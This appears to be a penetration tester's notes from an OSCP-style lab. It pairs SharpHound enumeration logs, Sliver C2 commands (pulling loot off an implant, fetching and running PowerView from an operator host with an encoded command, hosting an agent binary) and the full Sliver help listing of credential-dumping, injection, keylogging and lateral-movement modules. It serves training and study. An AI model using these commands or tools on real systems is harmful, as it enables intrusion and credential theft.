2025-07-06T06:02:28.6092375-07:00|ERROR|[CommonLib DCRegProc]Error getting data from registry for DC01.OSCP.EXAM: SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel:CertificateMappingMethods
System.Security.SecurityException: Requested registry access is not allowed.
at System.ThrowHelper.ThrowSecurityException(ExceptionResource resource)
at Microsoft.Win32.RegistryKey.OpenSubKey(String name, Boolean writable)
at SharpHoundCommonLib.SHRegistryKey.GetValue(String subkey, String name)
at SharpHoundCommonLib.Helpers.GetRegistryKeyData(String target, String subkey, String subvalue, ILogger log)
The Zone of the assembly that failed was:
MyComputer
2025-07-06T06:02:28.6250783-07:00|ERROR|[CommonLib DCRegProc]Error getting data from registry for DC01.OSCP.EXAM: SYSTEM\CurrentControlSet\Services\Kdc:StrongCertificateBindingEnforcement
System.Security.SecurityException: Requested registry access is not allowed.
at System.ThrowHelper.ThrowSecurityException(ExceptionResource resource)
at Microsoft.Win32.RegistryKey.OpenSubKey(String name, Boolean writable)
at SharpHoundCommonLib.SHRegistryKey.GetValue(String subkey, String name)
at SharpHoundCommonLib.Helpers.GetRegistryKeyData(String target, String subkey, String subvalue, ILogger log)
The Zone of the assembly that failed was:
MyComputer
2025-07-06T06:02:28.6623263-07:00|INFORMATION|Consumers finished, closing output channel
2025-07-06T06:02:28.6734273-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-07-06T06:02:28.8036967-07:00|INFORMATION|Status: 332 objects finished (+332 7.904762)/s -- Using 51 MB RAM
2025-07-06T06:02:28.8123637-07:00|INFORMATION|Enumeration finished in 00:00:42.5540337
2025-07-06T06:02:28.8550561-07:00|INFORMATION|Saving cache with stats: 273 ID to type mappings.
274 name to SID mappings.
3 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2025-07-06T06:02:28.8844479-07:00|INFORMATION|SharpHound Enumeration Completed at 6:02 AM on 7/6/2025! Happy Graphing!
[server] sliver (agent1) > download 20250706060228_BloodHound.zip
[*] Wrote 25188 bytes (1 file successfully, 0 files unsuccessfully) to /home/chel/offsec/Challenge 4 - OSCP A/20250706060228_BloodHound.zip
[server] sliver (agent1) >
fetch powershell script and call it with arguments
sliver (AMUSED_GEMSBOK) > sharpsh – ‘-u http://192.168.56.1:9090/PowerView.ps1 -e -c RwBlAHQALQBEAG8AbQBhAGkAbgBHAHIAbwB1AHAAIAAiAEQAbwBtAGEAaQBuACAAQQBkAG0AaQBuAHMAIgA=’
download recurusive into tgz
[server] sliver (agent) > download -r MicrosoftEdgeBackups
host content
[server] sliver > http
[server] sliver > websites add-content --website tool --content agent.exe
SQLrecon
See https://github.com/skahwah/SQLRecon/wiki
Troubleshooting
if this error occures, just delete the old
[server] sliver > implants
[server] sliver > implants rm agent-name
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[!] rpc error: code = Unknown desc = UNIQUE constraint failed: implant_builds.name
Overview
Commands:
=========
clear clear the screen
exit exit the shell
help use 'help [command]' for command help
monitor Monitor threat intel platforms for Sliver implants
wg-config Generate a new WireGuard client config
wg-portfwd List ports forwarded by the WireGuard tun interface
wg-socks List socks servers listening on the WireGuard tun interface
Generic:
========
aliases List current aliases
armory Automatically download and install extensions/aliases
background Background an active session
beacons Manage beacons
builders List external builders
canaries List previously generated canaries
cursed Chrome/electron post-exploitation tool kit (∩`-´)⊃━☆゚.*・。゚
dns Start a DNS listener
env List environment variables
generate Generate an implant binary
hosts Manage the database of hosts
http Start an HTTP listener
https Start an HTTPS listener
implants List implant builds
jobs Job control
licenses Open source licenses
loot Manage the server's loot store
mtls Start an mTLS listener
prelude-operator Manage connection to Prelude's Operator
profiles List existing profiles
reaction Manage automatic reactions to events
regenerate Regenerate an implant
sessions Session management
settings Manage client settings
stage-listener Start a stager listener
tasks Beacon task management
update Check for updates
use Switch the active session or beacon
version Display version information
websites Host static content (used with HTTP C2)
wg Start a WireGuard listener
Multiplayer:
============
kick-operator Kick an operator from the server
multiplayer Enable multiplayer mode
new-operator Create a new operator config file
operators Manage operators
Sliver - 3rd Party extensions:
==============================
bof-roast Beacon Object File repo for roasting Active Directory
bof-servicemove Lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking
c2tc-addmachineaccount AddMachineAccount [Computername] [Password <Optional>]
c2tc-askcreds Collect passwords using CredUIPromptForWindowsCredentialsName
c2tc-domaininfo enumerate domain information using Active Directory Domain Services
c2tc-kerberoast A BOF tool to list all SPN enabled user/service accounts or request service tickets (TGS-REP)
c2tc-kerbhash port of the Mimikatz/Rubeus hash command
c2tc-klist Displays a list of currently cached Kerberos tickets.
c2tc-lapsdump Dump LAPS passwords from specified computers within Active Directory
c2tc-petitpotam PetitPotam <capture server ip or hostname> <target server ip or hostname>
c2tc-psc show detailed information from processes with established TCP and RDP connections
c2tc-psk show detailed information from the windows kernel and loaded driver modules
c2tc-psm show detailed information from a specific process id
c2tc-psw Show Window titles from processes with active Windows
c2tc-psx show (detailed) information from all processes running on the system
c2tc-smbinfo Gather remote system version info using the NetWkstaGetInfo API
c2tc-spray-ad Perform a Kerberos or ldap password spraying attack against Active Directory
c2tc-startwebclient Starting WebClient Service Programmatically
c2tc-wdtoggle Patch lsass to enable WDigest credential caching
c2tc-winver Display the version of Windows that is running, the build number and patch release (Update Build Revision)
chisel Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH
chromiumkeydump Dump Chrome/Edge Masterkey
coff-loader Load and execute Beacon Object Files (BOFs) in memory.
credman Dump credentials using the CredsBackupCredentials API
delegationbof LDAP checks for RBCD, Constrained, Constrained w/Protocol Transition, Unconstrained Delegation, ASREP, and Kerberoastable SPNs
find-module Uses direct system calls to enumerate processes for specific modules
find-proc-handle Uses direct system calls to enumerate processes for specific process handles
go-cookie-monster Chrome cookie stealer with AppBound key support
handlekatz Implementation of handlekatz as a BOF (x64 only)
hashdump Dump local SAM password hashes
hollow EarlyBird process hollowing technique
inject-amsi-bypass Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.
inject-clipboard inject into a process
inject-conhost inject into a process
inject-createremotethread inject into a process
inject-ctray inject into a process
inject-dde inject into a process
inject-etw-bypass Inject ETW Bypass into Remote Process via Syscalls (HellsGate HalosGate)
inject-kernelcallbacktable inject into a process
inject-ntcreatethread inject into a process
inject-ntqueueapcthread inject into a process
inject-setthreadcontext inject into a process
inject-svcctrl inject into a process
inject-tooltip inject into a process
inject-uxsubclassinfo inject into a process
inline-execute-assembly in process .NET assembly execution
jump-psexec psexec lateral movement module
jump-wmiexec wmiexec lateral movement module
kerbrute A tool to perform Kerberos pre-auth bruteforcing
ldapsigncheck check LDAP signing
mimikatz A little tool to play with Windows security
nanodump A Beacon Object File that creates a minidump of the LSASS process.
nanorobeus Beacon Object File for managing Kerberos tickets
patchit patch, check and revert AMSI and ETW for x64 process
portbender TCP Port Redirection Utility
raw-keylogger Logs keystrokes using the raw input interface
remote-adcs-request Request an certificate from an AD certificate server
remote-adcs_request_on_behalf Requests an enrollment certificate on behalf of another user
remote-adduser Add a new user to a machine
remote-addusertogroup Add the specified user to the domain group
remote-chrome-key Get Decryption key usable with Chlonium (https://github.com/rxwx/chlonium)
remote-enable-user Unlock and enable a local / remote user account
remote-get_priv Activate the specified token privledge, more for non-cobalt strike users
remote-ghost_task direct registry manipulation to create scheduled tasks without triggering the usual event logs
remote-global_unprotect Attempts to find, decrypt, and download Global Protect VPN profiles and HIP settings
remote-lastpass Searches memory for LastPass passwords and hashes
remote-make_token_cert Applies an impersonation token based on the Alt Name in a supplied .pfx file
remote-office-tokens Searches memory for Office JWT Access Tokens
remote-procdump Dumps the specified process to the specified output file
remote-process-destroy Attempt to crash a local process by cutting all handles in it.
remote-process-list-handles list the various handles a process has open
remote-reg-delete Delete a registry key or value
remote-reg-save backup a registry have to a file on disk (requires Enabled SEBackup Priv)
remote-reg-set Dumps the specified process to the specified output file
remote-sc-config configure an existing service
remote-sc-create Create a new service on a windows system
remote-sc-delete delete a service from a windows based computer
remote-sc-description change description of a server
remote-sc-start Start service on a windows based system
remote-sc-stop stop service on a windows based system
remote-sc_failure sc_failure
remote-schtasks-delete Delete a scheduled task
remote-schtasks-stop stop a running scheduled task
remote-schtaskscreate Unlock and enable a local / remote user account
remote-schtasksrun run a scheduled task
remote-setuserpass set the password for a given user account
remote-shspawnas spawn / inject as specified user
remote-slackKey Decrypts the provided base64 encoded Chrome key
remote-slack_cookie Collect the Slack authentication cookie from a Slack process
remote-suspendresume uspend a process by pid
remote-unexpireuser Enables and unlocks the specified user account
sa-adcs-enum Enumerates CAs and templates in the AD using Win32 functions
sa-adcs-enum-com Enumerates CAs and templates in the AD using ICertConfig COM object
sa-adcs-enum-com2 Enumerates CAs and templates in the AD using IX509PolicyServerListManager COM object
sa-adv-audit-policies Retrieves advanced security audit policies
sa-arp Lists ARP table
sa-cacls Lists user permissions for the specified file, wildcards supported
sa-dir Lists a target directory using BOF.
sa-driversigs Enumerate installed services Image paths
sa-enum-filter-driver Enumerates all the filter drivers
sa-enum-local-sessions Enumerate the currently attached user sessions both local and over rdp
sa-env List process environment variables
sa-find-loaded-module Finds what processes *modulepart* is loaded into, optionally searching just *procnamepart*
sa-get-netsession Enumerates all sessions on the specified computer or the local one
sa-get-netsession2 Modified version of netsession that supports BOFHound
sa-get-password-policy Gets target server or domain's configured password policy and lockouts
sa-ipconfig Simply gets ipv4 addresses, hostname and dns server
sa-ldapsearch Execute LDAP searches (non paged)
sa-list_firewall_rules List Windows firewall rules
sa-listdns Pulls dns cache entries, attempts to query and resolve each
sa-listmods List a process' modules (DLL)
sa-locale List system locale language, locale ID, date, time, and country
sa-netgroup Lists Groups from the default (or specified) domain
sa-netlocalgroup List local groups from the local (or specified) computer
sa-netlocalgroup2 List server group members
sa-netloggedon Return users logged on the local or remote computer
sa-netloggedon2 Modified version of netloggedon that supports BOFHound
sa-netshares List shares on local or remote computer
sa-netstat TCP / UDP IPv4 netstat listing
sa-nettime Display time on remote computer
sa-netuptime Return information about the boot time on the local or remote computer
sa-netuser Pulls info about specific user.
sa-netuserenum Net user enumeration
sa-netview Net view
sa-notepad Search for open notepad and notepad++ windows and grab text from the editor control object
sa-nslookup Makes a dns query. NOTE: Some situations are limited due to observed crashes
sa-probe Check if a specific port is open
sa-reg-query Query the Windows registry
sa-regsession Return logged on user SIDs by enumerating HKEY_USERS
sa-routeprint Prints IPv4 configured routes
sa-sc-enum Enumerate Windows services
sa-sc-qc Queries the configuration information for a specified service.
sa-sc-qdescription sc qdescription implementation in bof
sa-sc-qfailure sc qfailure implementation in bof
sa-sc-qtriggerinfo Queries a service for trigger conditions.
sa-sc-query sc query implementation in bof
sa-schtasksenum Enumerates all scheduled tasks on the local or if provided remote machine
sa-schtasksquery Queries the given task from the local or if provided remote machine
sa-tasklist Get a list of running processes including PID, PPID and CommandLine (uses wmi)
sa-uptime Prints system boot time and how long it's been since then
sa-vssenum Enumerates shadow copies on some server 2012+ machines
sa-whoami Simulates whoami /all
sa-windowlist Lists visible windows in the current users session
sa-wmi-query Run a wmi query and display results in CSV format
scshell Fileless lateral movement
secinject Section Mapping Process Injection
syscalls_shinject Inject shellcode (either custom or beacon) into remote process using Syscalls
tgtdelegation tgtdelegation: Obtain a usable Kerberos TGT
threadless-inject Execute shellcode within a remote process via hooking function calls.
unhook-bof Remove API hooks from a Beacon process.
winrm Execute commands remotely via WinRM
Sliver - 3rd Party macros:
==========================
certify [Certify] Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services
krbrelayup [KrbRelayUp] A universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
mlokit [mlokit] MLOps Attack Toolkit
nps [NoPowerShell] PowerShell rebuilt in C# for Red Teaming purposes
rubeus [Rubeus] Rubeus is a C# tool set for raw Kerberos interaction and abuses.
seatbelt [Seatbelt] Seatbelt is a C# project that performs a number of security oriented host-survey 'safety checks'
sharp-hound-3 [Sharp Hound 3] C# based BloodHound Ingestor
sharp-hound-4 [SharpHound v4] C# based BloodHound Ingestor
sharp-smbexec [Sharp SMBExec] A native C# conversion of the Invoke-SMBExec powershell script
sharp-wmi [Sharp WMI] C# implementation of various WMI functionality
sharpchrome [SharpChrome] adaptation of work from @gentilkiwi and @djhohnstein, specifically his SharpChrome project
sharpdpapi [SharpDPAPI] # port of some DPAPI functionality from @gentilkiwi's Mimikatz project
sharpersist [SharPersist] Windows persistence toolkit
sharplaps [SharpLAPS] Retrieve LAPS password from LDAP
sharpmapexec [SharpMapExec] A sharpen version of CrackMapExec
sharprdp [SharpRDP] Remote Desktop Protocol .NET Console Application for Authenticated Command Execution
sharpsccm [SharpSCCM] A C# utility for interacting with SCCM
sharpsecdump [SharpSecDump] C# port of impacket's secretsdump.py functionality
sharpsh [sharpsh] C# .Net Framework program that uses RunspaceFactory for Powershell command execution.
sharpup [SharpUp] C# port of various PowerUp functionality
sharpview [SharpView] C# implementation of harmj0y's PowerView
sqlrecon [sqlrecon] MS SQL toolkit designed for offensive reconnaissance and post-exploitation
Sliver - Windows:
=================
backdoor Infect a remote file with a sliver shellcode
dllhijack Plant a DLL for a hijack scenario
execute-assembly Loads and executes a .NET assembly in a child process (Windows Only)
getprivs Get current privileges (Windows only)
getsystem Spawns a new sliver session as the NT AUTHORITY\SYSTEM user (Windows Only)
impersonate Impersonate a logged in user.
make-token Create a new Logon Session with the specified credentials
migrate Migrate into a remote process
psexec Start a sliver service on a remote target
registry Windows registry operations
rev2self Revert to self: lose stolen Windows token
runas Run a new process in the context of the designated user (Windows Only)
spawndll Load and execute a Reflective DLL in a remote process
Sliver:
=======
cat Dump file to stdout
cd Change directory
chmod Change permissions on a file or directory
chown Change owner on a file or directory
chtimes Change access and modification times on a file (timestomp)
close Close an interactive session without killing the remote process
download Download a file
execute Execute a program on the remote system
execute-shellcode Executes the given shellcode in the sliver process
extensions Manage extensions
getgid Get session process GID
getpid Get session pid
getuid Get session process UID
ifconfig View network interface configurations
info Get info about session
interactive Task a beacon to open an interactive session (Beacon only)
kill Kill a session
ls List current directory
memfiles List current memfiles
mkdir Make a directory
msf Execute an MSF payload in the current process
msf-inject Inject an MSF payload into a process
mv Move or rename a file
netstat Print network connection information
ping Send round trip message to implant (does not use ICMP)
pivots List pivots for active session
portfwd In-band TCP port forwarding
procdump Dump process memory
ps List remote processes
pwd Print working directory
reconfig Reconfigure the active beacon/session
rename Rename the active beacon/session
rm Remove a file or directory
rportfwd reverse port forwardings
screenshot Take a screenshot
shell Start an interactive shell
shikata-ga-nai Polymorphic binary shellcode encoder (ノ ゜Д゜)ノ ︵ 仕方がない
sideload Load and execute a shared object (shared library/DLL) in a remote process
socks5 In-band SOCKS5 Proxy
ssh Run a SSH command on a remote host
terminate Terminate a process on the remote system
upload Upload a file
whoami Get session user execution context